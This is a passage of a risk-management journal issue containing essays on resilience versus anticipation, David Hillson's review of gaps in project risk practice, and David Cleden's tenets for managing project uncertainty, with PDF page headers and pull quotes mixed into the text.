thus assumes that risks can be identified, characterised,
quantified and addressed in advance of their occurrence.
The separation of cause and effect, implied by these actions, depends on stability and equilibrium within the system. The purpose of intended action is to return the system
to the status quo following temporary disturbances. The
old world equates danger with deviation from the status
quo, which must be reversed. The purpose of risk management is to apply resources to eliminate such disturbances.
The old-world is thus busy projecting past experience into
the future. It is thus perfectly placed to address previous
battles but not new engagements.
The assumption of anticipation offers a bad bet in an
uncertain and unpredictable environment. An alternative
strategy is resilience, which represents the way an organism or a system adapts itself to new circumstances in a more
active and agile search for safety. The type of approach
applied by new-world practitioners calls for an ability to
absorb change and disruption, keep options open, and deal
with the unexpected by conserving energy and utilising sur-
Farewell Edition
© Novática
Risk Management
“
Risk is traditionally perceived as negative quantity,
danger, hazard or potential harm
”
plus resources more effectively and more creatively.
The secret in new-world thinking is to search for the
next acceptable state rather than focus on returning to the
previous state. In the absence of knowledge about the future, it is still possible to respond to change, by finding a
new beneficial state as the result of a disturbance. Bouncing back and grabbing new opportunities becomes the order of the day. Entrepreneurs, like pilots, learn to deal with
new situations through the gradual development of a portfolio of coping patterns and strategies that is honed by experience. Above all they learn to adapt and respond.
New-world actors grow up experimenting. Trial and
experimentation makes them more knowledgeable and capable. Experiments provide information and varied experience about unknown processes, different strategies and alternative reaction modes. Intelligent risk-taking in the form
of trial and error leads to true learning and ultimate improvement. The key to avoiding dramatic failures, and to
developing new methods and practice in dealing with them,
lies in such learning-in-the-small.
Acceptance of small errors is at the crux of developing
the skills and capability to deal with larger problems. Small
doses of danger provide the necessary feedback for learning and improvement. Similar efforts are employed by credit
card companies, banks and security organisations, who orchestrate frequent threats and organised breaches of security to test their capability and learn new strategies and approaches for coping with problems. In the new world, taking small chances is a part of learning — and so is failure!
Small, recognisable and reversible actions permit experimentation with new phenomena at relatively low risks. Once
again we paradoxically discover that contained experimentation with danger leads to improved safety.
Large numbers of small moves, with frequent feedback
and adjustment permit experimentation on a large scale with
new phenomena at relatively low risks. Contained experimentation with danger leads to improved understanding of
safety. Risk management is therefore a balancing act between stopping accidents, increasing safety, avoiding catastrophes and receiving rewards. Traditional
mechanistically based risk management spends too much
time and effort on minimising accidents: as a result it loses
the ability to respond, ignores potential rewards and opportunities, and may face tougher challenges as they accumulate. It also focuses excessively on reducing accidents, to
the extent that rewards are often neglected and excluded
from decision-making frames. Such fixation with worst-case
scenarios and anticipation of worst-case circumstances often leads to an inability to deal with alternative scenarios.
In the new world, safety is not a state or status quo, but
© Novática
Farewell Edition
a dynamic process that tolerates natural change and discovery cycles. It can thus be viewed as a discovered commodity. This resource needs to be maintained and cherished
to preserve its relevance and value. Accepting safety (and
even danger?) as a resource makes possible the adoption of
a long-term perspective, and it thus becomes natural to strive
for the continuous improvement of safety.
While many organisations may object to the introduction of risk assessment and risk management because of
the negative overtones, it is more difficult to resist an ongoing perspective emphasising improvement and enhanced
safety. After all, successful risk assessment, like testing, is
primarily concerned with identifying problems (albeit before they occur). The natural extension, therefore, is not to
focus simply on risk as a potential for achievement, but to
regard the safety to which it can lead as a resource worth
cherishing.
Like other commodities, safety degrades and decays
with time. The safety asset therefore needs continuous maintenance to reverse entropy and maintain its relevance with
respect to an ever-changing environment. Relaxing of this
effort will lead to a decline both in the level of safety and in
its value as a corporate asset. In order to maintain its value,
the process of risk management (or more appealingly, safety
management) must be kept central and continuous.
Exploring risks as an ongoing activity offers another
strategic advantage, in the form of the continuous discovery of new opportunities. Risk anticipation locks actors into
the use of tactics that have worked in the past (even doing
nothing reduces the number of available options). Resilience and experimentation can easily uncover new options
and innovative methods for dealing with problems. They
thus lead to divergence, and the value of the created diversity is in having the ability to call on a host of different
types of solutions.
Miller and Freisen observe that successful organisations
appear to be sensitive to changes in their environment [2].
Peters and Waterman [3] report that successful companies
typically:
„ experiment more,
„ encourage more tries,
„ permit small failures,
„ keep things small,
„ interact with customers,
„ encourage internal competition and allow resultant
duplication and overlap, and
„ maintain a rich information environment.
Uncertainty and ambiguity lead to potential opportunities as well as ‘unanticipated’ risks. Resilience is built
through experimentation, through delaying commitment,
CEPIS UPGRADE Vol. XII, No. 5, December 2011
43
Risk Management
“
Acceptance of small errors is at the crux of developing
the skills and capability to deal with larger problems
through enabling, recognising and embracing opportunities
and, above all, through the acquisition of knowledge, experience and practice in dealing with adversity-in-the-small.
Risk management requires flexible technologies arranged
with diversity and agility. Generally, a variety of styles, approaches and methods are required to ensure that more problems can be resolved. This argument can be extended to propose that such a diverse armoury should include anticipation (which is essentially proactive), as well as resilience
(essentially reactive in response to unknowable events) in
various combinations. The two approaches are not mutually exclusive and can complement one another as each responds to a particular type of situation.
Resilience and exploration are ideal under conditions of
ambiguity and extreme uncertainty. Anticipation can be used
under risky, yet reasonably certain, conditions; while the
vast space in between would qualify for a balanced combination of anticipation and resilience operating in concert.
The management of risks therefore needs to be coupled
to the nature of the environment. After all, managing progress
is not about fitting an undertaking to a (probably already
redundant) plan, but is about reducing the difference between plan and reality. This need not be achieved through
the elimination of problems (which may prove to be a source
of innovation), but through adaptation to changing circumstances. By overcoming the momentum that resists change,
with small incursions and experiments leading to rapid feedback, it becomes possible to avoid major disasters and dramatic failures through acting in-the-small and utilising agile risk management.
Remember the two Worlds?
Well, it appears we need both. The old world is outstanding at using available information in an effort to improve
efficiency and execution, while the new world is concerned
with potential, promise and innovation.
The single most important characteristic of success has
often been described as conflict or contention. The clash
between the worlds provides just that. It gives rise to a portfolio of attitudes, experiences and expertise that can be used
as needed. Skilful manipulation of the safety resource and
the knowledge of both worlds would entail balancing a portfolio of risks, ensuring that the right risks are taken and that
the right opportunities are exploited while keeping a watchful eye on the balance between safety and danger. A satisfactory balance will thus facilitate the exploration of new
possibilities alongside the exploitation of old and well-understood certainties. By consulting all those affected by risks,
and by maximising the repertoire, it becomes possible to
damp the social amplification of risk and to embrace risk
44
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
and danger from an intelligent and collective perspective.
If this balance is not achieved, one of the two worlds
will prevail. They will bring with them their baggage, which
will dominate risk practice. A practice dominated by either
‘better safe than sorry’ or ‘no pain, no gain’ will be unable
to combine the benefits of agile exploration and mature exploitation. Intelligent risk management depends on a dynamic balancing act that is responsive to environmental
feedback.
Perhaps more importantly, the justification for creating
such a balance lies in taking a long-term perspective and
viewing safety as an evolving commodity. Risk management is not a service. A specific risk may be discrete, but
risk management is a growing and evolving body of knowledge -- an improving asset. In this improvement lies the
value of the asset.
"There is no point in getting into a panic about the risks
of life until you have compared the risks which worry you
with those that don’t, but perhaps should!"
Lord N. Rothschild, 1978
Once we graduate beyond viewing risk management as
a fad offered by either world, we can find the middle ground
and the benefit of both worlds.
References:
[1] U. Beck, Risk Society: Towards a New Modernity,
Sage, London, 1992.
[2] D. Miller and P. H. Friesen, "Archetypes of Strategy
Formulation", Management Science, Vol. 24, 1978, pp.
921-923.
[3] T J. Peters and R. H. Waterman, In Search Of Excellence: Lessons From America’s Best-Run Companies,
Harper and Row, London, 1982.
To probe further:
„ C. Hood and D. K. C. Jones (Eds.), Accident and Design: Contemporary Debates in Risk Management, UCL
Press, London, 1996.
„ V. Postrel, The Future and Its Enemies: The Growing
Conflict over Creativity, Enterprise and Progress,
Scribner Book Company, 1999.
„ A. Wildavsky, Searching for Safety, Transaction Books,
Oxford, 1988.
„ <http://www.biotech-info.net/precautionary.html>.
„ <http://europa.eu.int/comm/dgs/health_consumer/library/press/press38_en.html>.
„ <http://www.sehn.org/precaution.html>.
Farewell Edition
© Novática
Risk Management
Managing Risk in Projects: What’s New?1
David Hillson, "The Risk Doctor"
Project Risk Management has continued to evolve into what many organisations consider to be a largely mature discipline. Given this evolution we can ask if there are still new ideas that need to be considered in the context of managing
project risks. In this article we consider the state of project risk management and reflect on whether there is still a
mismatch between project risk management theory and practice. We also look for gaps in the available practice and
suggest some areas where further improvement may be needed, thereby offering insights into new approaches and perspectives.
Keywords: Energy Levels for Risk Management, Human Aspects, Individual Project Risk, Overall Project Risk,
Post-Project Review, Project Risk Management Principles,
Project Risk Process, Risk Responses.
Author
David Hillson (FIRM HonFAPM PMI-Fellow FRSA FCMI),
known globally as “The Risk Doctor”, is an international risk
consultant and Director of Risk Doctor & Partners, offering
specialist risk management consultancy across the globe, at both
strategic and tactical levels. He has worked in over 40 countries
with major clients in most industry sectors. David is recognised
internationally as a leading thinker and practitioner in risk
management, and he is a popular conference speaker and author
on the subject. He has written eight books on risk, as well as
many papers. He has made several innovative contributions to
the discipline which have been widely adopted. David is wellknown for promoting inclusion of opportunities throughout the
risk process. His recent work has focused on risk attitudes (see
<http:/www.risk-attitude.com>), and he has also developed a
scaleable risk methodology, <http:// www.ATOM-risk.com>.
David was named Risk Personality of the Year in 2010 by the
Institute of Risk Management (IRM). He was the first recipient
of this award, recognising his significant global contribution to
improving risk management and advancing the risk profession.
He is also an Honorary Fellow of the UK Association for Project
Management (APM), and a PMI Fellow in the Project
Management Institute (PMI®), both marking his contribution
to developing project risk management. David was elected a
Fellow of the Royal Society of Arts (RSA) to contribute to its
Risk Commission. He is currently leading the RSA Fellows
project on societal attitudes to failure. He is also a Chartered
Manager and Fellow of the Chartered Management Institute
(CMI), reflecting his broad interest in topics beyond his own
speciality of risk management. <[email protected]>
Humans have been undertaking projects for millennia,
with more or less formality, and with greater or lesser degrees of success. We have also recognised the existence of
risk for about the same period of time, understanding that
things don’t always go according to plan for a range of reasons. In relatively recent times these two phenomena have
coalesced into the formal discipline called project risk management, offering a structured framework for identifying
and managing risk within the context of projects. Given the
prevalence and importance of the subject, we might expect
that project risk management would be fully mature by now,
only needing occasional minor tweaks and modifications
to enhance its efficiency and performance. Surely there is
nothing new to be said about managing risk in projects?
While it is true that there is wide consensus on project
risk management basics, the continued failure of projects
to deliver consistent benefits suggests that the problem of
risk in projects has not been completely solved. Clearly there
must be some mismatch between project risk management
theory and practice, or perhaps there are new aspects to be
discovered and implemented, otherwise all project risks
would be managed effectively and most projects would succeed.
“
Project risk management
offers a structured framework
for identifying and managing
risk within the context
of projects
”
© Novática
Farewell Edition
So what could possibly remain to be discovered about
this venerable topic? Here are some suggestions for how
we might do things differently and better, under four headings:
1
This article was previously published online in the "Advances in
Project Management" column of PM World Today (Vol. XII Issue II
- February 2010), <http://www.pmworldtoday.net/>. It is republished
with all permissions.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
45
Risk Management
“
The continued failure of projects to deliver
consistent benefits suggests that the problem of risk in projects
has not been completely solved
1.
2.
3.
4.
Principles
Process
People
Persistence
Problems with Principles
There are two potential shortfalls in the way most project
teams understand the concept of risk. It is common for the
scope of project risk management processes to be focused
on managing possible future events which might pose threats
to project cost and schedule. While these are undoubtedly
important, they are by no means the full story. The broad
proto-definition of risk as "uncertainty that matters" encompasses the idea that some risks might be positive, with potential upside impacts, mattering because they could enhance
performance, save time or money, or increase value. And
risks to objectives other than cost and schedule are also important and must be managed proactively. This leads to the
use of an integrated project risk process to manage both
threats and opportunities alongside each other. This is more
than a theoretical nicety: it maximises a project’s chances
of success by intentionally seeking out potential upsides and
capturing as many as possible, as well as finding and avoiding downsides.
Another conceptual limitation which is common in the
understanding of project risk is to think only about detailed
events or conditions within the project when considering
risk. This ignores the fact that the project itself poses a risk
to the organisation at a higher level, perhaps within a programme or portfolio, or perhaps in terms of delivering strategic value. The distinction between "overall project risk"
and "individual project risks" is important, leading to a recognition that risk exists at various levels reflecting the context of the project. It is therefore necessary to manage overall project risk (risk of the project) as well as addressing
individual risk events and conditions (risks in the project).
This higher level connection is often missing in the way project
risk management is understood or implemented, limiting the
value that the project risk process can deliver. Setting project
risk management in the context of an integrated Enterprise Risk
Management (ERM) approach can remedy this lack.
Problems with Process
The project risk process as implemented by many organisations is often flawed in a couple of important respects.
The most significant of these is a failure to turn analysis
into action, with Risk Registers and risk reports being produced and filed, but with these having little or no effect on
how the project is actually undertaken. The absence of a
46
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
formal process step to "Implement Risk Responses" reinforces this failing. It is also important to make a clear link
between the project plan and risk responses that have been
agreed and authorised. Risk responses need to be treated in
the same way as all other project tasks, with an agreed
owner, a budget and timeline, included in the project plan,
reported on and reviewed. If risk responses are seen as "optional extras" they may not receive the degree of attention
they deserve.
A second equally vital omission is the lack of a "postproject review" step in most risk processes. This is linked
to the wider malaise of failure to identify lessons to be
learned at the end of each project, denying the organisation
the chance to learn from its experience and improve performance on future projects. There are many risk-related
lessons to be learned in each project, and the inclusion of a
formal "Post-project Risk Review" will help to capture
these, either as part of a more generic project meeting or as
a separate event. Such lessons include identifying which
threats and opportunities arise frequently on typical projects,
finding which risk responses work and which do not, and
understanding the level of effort typically required to manage risk effectively.
Problems with People
It is common for project risk management to be viewed
as a collection of tools and techniques supporting a structured system or a process, with a range of standard reports
and outputs that feed into project meetings and reviews.
This perspective often takes no account of the human aspects of managing risk. Risk is managed by people, not by
machines, computers, robots, processes or techniques. As
a result we need to recognise the influence of human psychology on the risk process, particularly in the way risk
attitudes affect judgement and behaviour. There are many
sources of bias, both outward and hidden, affecting individuals and groups, and these need to be understood and
managed proactively where possible.
The use of approaches based on emotional literacy to
address the human behavioural aspects of managing risk in
projects is in its infancy. However some good progress has
been made in this area, laying out the main principles and
boundaries of the topic and developing practical methods
for understanding and managing risk attitude. Without taking this into account, the project risk management process
as typically implemented is fatally flawed, relying on judgements made by people who are subject to a wide range of
unseen influences, and whose perceptions may be unreliable with unforeseeable consequences.
Farewell Edition
© Novática
Risk Management
“
Risks to objectives other than cost and schedule
are also important and must be managed proactively
”
Problems with Persistence
Even where a project team has a correct concept of risk
that includes opportunity and addresses the wider context,
and if they ensure that risk responses are implemented effectively and risk-related lessons are learned at the end of
their project, and if they take steps to address risk attitudes
proactively – it is still possible for the risk process to fail!
This is because the risk challenge is dynamic, constantly
changing and developing throughout the project. As a result, project risk management must be an iterative process,
requiring ongoing commitment and action from the project
team. Without such persistence, project risk exposure will
get out of control, the project risk process will become ineffective and the project will have increasing difficulty in
reaching its goals.
Insights from the new approach of "risk energetics" suggest that there are key points in the risk process where the
energy dedicated by the project team to managing risk can
decay or be dampened. A range of internal and external
Critical Success Factors (CSFs) can be deployed to raise
and maintain energy levels within the risk process, seeking
to promote positive energy and counter energy losses. Internal CSFs within the control of the project include good
risk process design, expert facilitation, and the availability
of the required risk resources. Equally important are external CSFs beyond the project, such as the availability of appropriate infrastructure, a supportive risk-aware organisational culture, and visible senior management support.
So perhaps there is still something new to be said about
managing risk in projects. Despite our long history in attempting to foresee the future of our projects and address
risk proactively, we might do better by extending our concept of risk, addressing weak spots in the risk process, dealing with risk attitudes of both individuals and groups, and
taking steps to maintain energy levels for risk management
throughout the project. These simple and practical steps offer
achievable ways to enhance the effectiveness of project risk
management, and might even help us to change the course
of future history.
Note: All of these issues are addressed in the book "Managing Risk in Projects" by David Hillson, published in August 2009
by Gower (ISBN 978-0-566-08867-4) as part of the Fundamentals in Project Management series.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
47
Risk Management
Our Uncertain Future
David Cleden
Risk arises from uncertainty but it is difficult to express all types of uncertainty in terms of risks. Therefore managing
uncertainty often requires an approach which differs from conventional risk management. A knowledge of the lifecycle of
uncertainty (latency, trigger points, early warning signs, escalation into crisis) helps to inform the different strategies
which can be used at different stages of the lifecycle. This paper identifies five tenets to help project teams deal more
effectively with uncertainty, combining pragmatism (e.g. settle for containing uncertainty, don’t try to eliminate it completely), an emphasis on informed decision-making, and the need for projects to be structured in an agile fashion to
increase their resilience in the face of uncertainty.
Keywords: Agility, Decision-Making, Latent Uncertainty, Management Strategies, Resilience, Risk, Trigger
Point, Uncertainty, Uncertainty Lifecycle, Unexpected Outcomes.
1 Introduction
There is a fundamental truth that all management professionals would do well to heed: all risks arise from uncertainties, but not all uncertainties can be dealt with as
risks. By this we mean that uncertainty is the source of every
risk (arising from, for example, information that we don’t
possess, something that we can’t forecast, decisions that
have not yet been made). However, a set of project risks –
no matter how comprehensive the risk analysis – will only
address a subset of the uncertainties which threaten a project.
We know this empirically. For every credible risk that is
identified, we reject (or choose to ignore) a dozen others.
These are ‘ghost risks’ – events considered to be most unlikely to occur, or too costly to make any kind of effective
provision for. Risk management quite rightly acts on priorities: what are the things that represent the greatest threat
to this project, and what action can be take to reduce this
threat? But prioritisation means that at some point the line
is drawn: above it are the risks that are planned for and
actively managed. Below the line, these risks have a low
likelihood of occurring, or will have minimal impact if they
do, or (sometimes) have no effective means of prevention
or mitigation. Not surprisingly, where the line is drawn very
much depends on a project’s ‘risk appetite’. A project with
a low risk appetite where human lives or major investment
is at stake, will be far more diligent in the risk analysis than
one where the prospect of failure may be unwelcome but
can be tolerated.
No matter where the line is drawn in terms of risks we
choose to recognise, there remain risks that cannot be formulated at this time, no matter how desirable this might be.
By definition, if we cannot conceive of a threat, we cannot
formulate it as a risk and manage it accordingly, as Figure 1
shows. These may be the so-called ‘black swan’ events, or
‘bolts from the blue’ – things that it would be very difficult,
if not impossible to know about in advance – or, just as
48
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Author
David Cleden is a senior Project Manager with more than twenty
years experience of commercial bid management and project
delivery, mainly within the public sector. With a successful track
record in delivering large and technically challenging IT projects,
he also writes widely on the challenges faced by modern
businesses striving for efficiency through better management
processes. He is the author of "Managing Project Uncertainty"
published by Gower, part of the Advances in Project
Management series edited by Professor Darren Dalcher, and “Bid
Writing for Project Managers”, also published by Gower.
<[email protected]>
likely, they may be gaps in our understanding or knowledge of the tasks to be undertaken.
A knowledge-based analytical approach is often helpful to understanding the threat from this kind of uncertainty.
Some uncertainty is susceptible to analysis and can be managed as risks, but some cannot. We don’t know anything
about these risks (principally because we have not or cannot conceive of them) but it is entirely possible that some
of these would rank highly in our risk register if we could.
Let’s examine the possibilities (see Figure 2). The topleft quadrant describes everything that we know (or think
we know about the project). This is the knowledge which
plans are built on, which informs our decision-making processes and against which we compare progress. Broadly
speaking, these are the facts of the project.
Often there are more facts available than we realise.
These are things that we don’t know, but could if we tried.
This untapped knowledge can take many forms – a col-
“
This paper identifies
five tenets to help
project teams deal more
effectively with uncertainty
Farewell Edition
”
© Novática
Risk Management
strategy for dealing with uncertainty. The unfathomable uncertainty of ‘unknown unknowns’ may not
be susceptible to the kind of analysis techniques used
in risk management, but that doesn’t mean a project
cannot be prepared to deal with uncertainty.
2 The Lifecycle of Uncertainty
Figure 1: Not All Uncertainties can be analysed and
formulated as Risks.
league with relevant experience or skills that we haven’t
consulted, lessons learnt from a previous project which could
aid our decision-making, standards, guidelines and best practices which the project team have overlooked – and many
other things besides. In the knowledge-centric view of uncertainty, clearly the more facts and information we possess, the better able we are to deal with uncertainty.
Naturally, no matter how good our understanding of the
project’s context, there will always be gaps. By acknowledging this, we accept that there are some things about the
project that we don’t know or can’t predict with accuracy
(the classic ‘known unknowns’). However, as long as they
can be conceived of, they can be addressed as risks using
risk management techniques.
What does this leave us with? The fourth quadrant, the
‘unknown unknowns’ represents the heart of uncertainty.
This kind of uncertainty is unfathomable; it is not susceptible to analysis in the way that risks are. By definition we
have little knowledge of its existence (although if we did,
we might be able to do something about it). Some terrible
event (a natural disaster or freak combination of circumstances, say) may occur tomorrow which will fundamentally undermine the basis on which the project has been
planned, but we have no way of knowing the specifics of
this event or how it might impact the project.
Note that it is possible to know a situation is unfathomable without being able to change the fundamental nature of
the uncertainty. Someone may tell us that a terrible danger
lurks behind a locked door, but we still have no idea (and no
practical way of finding out) what uncertainty faces us if we
unlock the door and enter. We know the situation is unfathomable but we don’t know what it is that we don’t know. In other
words, the future is still unforeseeable.
All this points to a need for a project to have not only a
sound risk management strategy in place, but an effective
© Novática
Farewell Edition
Any strategy for managing project uncertainty
depends on an understanding of the lifecycle of uncertainty. At different stages in this lifecycle we have
different opportunities for addressing the issues.
It begins with a source of uncertainty (see Figure 3). In the moment of crisis we may not always
be aware of the source, but hindsight will reveal its
existence. If detected early enough, anticipation
strategies can be used to contain the uncertainty at
source. Anticipating uncertainty often means trying
to learn more about the nature of the uncertainty;
for example by framing the problem it represents,
or modelling future scenarios and preparing for them.
Using discovery techniques such as constructing a
knowledge map of what is and isn’t known about a
particular issue can highlight key aspects of unfathomable
uncertainty. Of course, once a source of uncertainty is revealed, it is no longer unfathomable and can be dealt with
as a project risk.
The greatest threat arises towards the end of the uncertainty lifecycle as problems gain momentum and turn into
crises. Something happens to trigger a problem, giving rise
to an unexpected event. For example, it may not be until
two components are integrated that it becomes apparent that
incorrect manufacturing tolerances have been used. The latent uncertainty (what manufacturing tolerance is needed?)
triggers an unexpected outcome (a bad fit) only at the point
of component integration, even though the uncertainty could
have been detected much earlier and addressed.
This trigger may be accompanied by early warning signs.
Figure 2: A Knowledge-centric View of Uncertainty and Risk.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
49
Risk Management
Figure 3: The Uncertainty Lifecycle and the Strategies Best Suited to addressing Uncertainty.
An alert project manager may be able to respond swiftly
and contain the problem even without prior knowledge of
the uncertainty, either by recognising the warning signs or
removing the source of uncertainty before it has a chance to
develop.
It is also worth remembering that many kinds of uncertainty will never undergo the transition which results in an
unexpected outcome. Uncertainty which doesn’t manifest
as a problem is ultimately no threat to a project. Once again,
the economic argument (that it is neither desirable nor possible to eliminate all uncertainty from a project) is a powerful one. The goal is to focus sufficient effort on the areas of
uncertainty that represent the greatest threat and have the
highest chance of developing into serious problems.
Based on this understanding of the uncertainty lifecycle,
different sets of strategies are effective at different points:
„ Knowledge-centric strategies: These help to reveal
the sources of uncertainty, resolve them where possible or
prepare appropriately, for example through mitigation planning and risk management.
„ Anticipation strategies: These offer a more holistic approach than the knowledge-centred view of uncertainty. By looking at a project from different perspectives,
for example by visualising future scenarios and examining
causal relationships, previously hidden uncertainties are
revealed.
„ Resilience strategies: Trying to contain uncertainty
at source will never be 100 percent successful. Therefore, a
project needs resilience and must be able to detect and respond rapidly to unexpected events. Whilst it is impossible
“
All risks arise from uncertainties,
but not all uncertainties can be dealt with as risks
50
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© Novática
Risk Management
Figure 4: The Illusion of Project Stability.
to predict the nature of the problems in advance, a project
manager can employ strategies which will imbue their
projects with much greater resilience.
„ Learning strategies: These give the project manager and the organisation as a whole the ability to improve
and benefit from experience over time. No two projects face
exactly the same uncertainty, so it is important to be able to
adapt and learn lessons.
3 Five Tenets for Dealing Effectively with Project
Uncertainty
3.1 Aim to contain Uncertainty, not eliminate it
No individual can bring order to the universe, and neither can the project manager protect his or her project from
every conceivable threat. Managers who try to do this labour under unworkable risk management regimes, constructing unwieldy risk logs and impossibly costly mitigation
plans. Amidst all the effort being poured into managing
small, hypothetical risks (the ‘ghost risks’), a project manager may be too busy to notice that the nuts and bolts of the
project – where the real focus of attention should be – have
come loose. It is much better to concentrate on detecting
and reacting swiftly to early signs of problems. Whilst uncertainty can never be entirely eliminated, it can mostly certainly be contained, and that should be good enough. Ultimately this is a far more effective use of resources.
“
Managing uncertainty often
requires an approach which
differs from conventional
risk management
”
© Novática
Farewell Edition
It may be helpful to visualise the project as existing in a
continual state of dynamic tension (see Figure 4). The accumulation of uncertainties continually tries to push the
project off its planned path. If left unchecked, the problems
may grow so severe that there is no possibility of recovering back to the original plan.
The project manager’s role is to act swiftly to correct
the deviations, setting actions to resolve issues, implementing contingency plans or nipping problems in the bud. This
requires mindfulness and agility: mindfulness to be able to
spot things going wrong at the earliest possible stage, and
agility in being able to react swiftly and effectively to damp
down the problems and bring the project back on track.
3.2 Uncertainty is an Attribute not an Entity in its
Own Right
We often talk about uncertainties as if they are discrete
objects when in fact uncertainty is an attribute of every aspect of the project. The ‘object’ model of uncertainty is
unhelpful because it suggests that there are clusters of uncertainties hiding away in the darker corners of the project.
If only we could find them, we could dispose of them and
our project would be free of uncertainty.
This is a flawed point of view. Uncertainty attaches to
every action or decision much like smell or colour does to
a flower. The level of uncertainty may be strong or weak
but collectively we can never completely eliminate uncertainty because the only project with no uncertainty is the
project that does nothing.
Once this is accepted, it becomes pointless to attempt to
manage uncertainty in isolation from everything else. A
project manager cannot set aside a certain number of hours
each week to manage uncertainty, it is inherent in every
decision taken. Uncertainty cannot be compartmentalised.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
51
Risk Management
Figure 5: Collective Team Responsibility to react rapidly during the Transition Period is
Key to minimising the Impact of Uncertainty.
“
A knowledge of the lifecycle of uncertainty helps
to inform the different strategies which can be used
at different stages of the lifecycle
”
Figure 6: Four Possible Modes for confronting Major Uncertainty.
52
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
“
Naturally, no matter how good our understanding
of the project’s context, there will always be gaps
It lurks in all project tasks, in their dependencies and underlying assumptions.
Alertness to any deviation from the norm is vital. A culture of collective problem ownership and responsibility is
also important. All team members need to be capable of
resolving issues within their domain as soon as they are
spotted. The period between a trigger event and a full-blown
crisis is often small, so there may not always be time to
refer up the management chain and await a decision. The
ability to act decisively – often on individual initiative –
needs to be instilled in the team and backed up by clear
lines of responsibility and powers of delegation. In time,
this should become part of the day job for members of the
team at all levels.
Project tolerances can sometimes mask emerging uncertainty. Thresholds need to be set low enough so that issues are picked up early in the uncertainty lifecycle, giving
more time to react effectively. It also depends on the nature
of the metrics being used to track progress, for example:
number of defects appearing at the prototyping stage, individual productivity measures, number of client issues
flagged, etc. Choose the metrics carefully. The most obvious metrics will not necessarily give the clearest picture (or
the earliest warning) of emerging problems.
3.3 Put Effective Decision-making at the Heart of
Managing Uncertainty
When faced with uncertainty, the project manager has
several options available (see Figure 6). The project manager must decide how to act – either by suppressing uncertainty (perhaps through plugging knowledge gaps), or adapting to it by drawing up mitigation plans, or detouring around
it and finding an alternative path to the project’s goals.
Whichever action is taken, the quality of decision-making determines a project’s survival in the face of uncertainty
and is influenced by everything from individual experience,
”
line management structures, to the establishment of a blamefree culture which encourages those put on the spot to act
in the project’s best interests with confidence. As the old
adage says: Decisions without actions are pointless. Actions without decisions are reckless.
The most commonly used tactic against major uncertainty is to suppress it, reduce the magnitude of the uncertainty and hence the threat it represents. If this can be done
pre-emptively by reducing the source of the uncertainty,
the greatest benefits will be achieved. Avoiding uncertainty
by suppressing it sounds like a safe bet – and it is, providing it can be done cost-effectively. As the first tenet states,
reduction is the goal, not elimination. For novel or highly
complex projects, particularly those with many co-dependencies, it may be too difficult or costly to suppress all possible areas of uncertainty.
By adapting to uncertainty, the project tolerates a working level of uncertainty but is prepared to act swiftly to
limit the most damaging aspects of any unexpected events.
This is a highly pragmatic approach. It requires agile and
flexible management processes which can firstly detect
emerging issues in their infancy and secondly, deal with
them swiftly and decisively. For example, imagine a yacht
sailing in strong winds. The helmsman cannot predict the
strength of sudden gusts or the direction in which the boat
will be deflected, but by making frequent and rapid tiller
adjustments, the boat continues to travel in an approximately
straight line towards its destination.
Given the choice, we should like to detour around all
areas of uncertainty. Avoiding the source of uncertainty
means that the consequences (that is, the unexpected outcomes) are no longer relevant to the project. Thus there is
no need to take costly precautions to resolve unknowns or
deal with their repercussions. Unfortunately, detouring
around uncertainty is hard to achieve, for two reasons.
Firstly, many sources of uncertainty are simply unavoid-
Figure 7: Making an Intuitive Leap to visualise a Future Scenario.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
53
Risk Management
able, or the avoidance measures are too costly. Consider
the example of a subcontractor who, it later transpires, may
be incapable of delivering a critical input on time. We could
detour around this uncertainty by dismissing the subcontractor in favour of some competitor who can provide a better service. This will mean cancelling existing contracts,
researching the marketplace and renegotiating commercial
terms with an alternative supplier – all time-consuming and
potentially costly activities – and with the risk of being no
better off with the alternative supplier.
Secondly, detouring only works for quantifiable uncertainty (the ‘known unknowns’). Unfathomable uncertainty
may well strike too rapidly to permit a detour.
Our final option is reorientation. This is a more dramatic form of detour where we aim for a modified set of
objectives in the face of insurmountable uncertainty. Highly
novel projects sometimes have to do this. To plough on in
the face of extreme uncertainty risks total failure. The only
alternative is to redefine the goals, that is, reorient the project
in a way that negates the worst of the uncertainty. This is not a
tactic for the faint-hearted. Convincing the client that a project
cannot be delivered as originally conceived is no easy task.
But it is worth asking the question, "Is it better to deliver something different (but broadly equivalent) than nothing at all?"
3.4 Uncertainty encompasses both Opportunity
and Threat
It is important to seize opportunities when they arise. If
some aspects of a project are uncertain, it means there are
still choices to be made, so we must choose well. Too often,
the negative consequences dominate the discussion, but
perhaps the project can achieve more than was planned, or
achieve the same thing by taking a different path. Is there a
chance to be innovative? Project managers must always be
open to creative solutions. As Einstein said, "We can’t solve
problems by using the same kind of thinking we used when
we created them."
All approaches to dealing with uncertainty depend to a
greater or lesser extent on being able to forecast future
events. The classic approach is sequential: extrapolating
from one logical situation to the next, extending out to some
point in the future. But with each step, cumulative errors
build up until we are no longer forecasting but merely enumerating the possibilities.
Suppose instead we don’t try to forecast what will happen, but focus on what we want to happen? This means
visualising a desired outcome and examining which attributes of that scenario are most valuable. Working backwards from this point, it becomes possible to see what circumstances will naturally lead to this scenario. Take another step back, and we see what precursors need to be in
place to lead to the penultimate step – and so on until we
“
54
have stepped back far enough to be within touching distance of the current project status. (See Figure 7).
This approach focuses on positive attributes (what are
the project’s success criteria?) not the negative aspects of
the risks to be avoided. Both are important, but many project
managers forget to pay sufficient attention to nurturing the
positive aspects. By ‘thinking backwards’ from a future scenario, the desired path often becomes much clearer. It is
ironic that ‘backward thinking’ is often just what is needed
to lead a project forward to successful completion.
3.5 Meet Uncertainty with Agility
Perhaps the best defence against uncertainty is to organise and structure a project in a sufficiently agile fashion
to be resilient to the problems that uncertainty inevitably
brings. This manifests in two ways: how fast can the project
adapt and cope with the unexpected, and how flexible is
the project in identifying either new objectives or new ways
to achieve the same goals?
One approach is to ensure that the project only ever takes
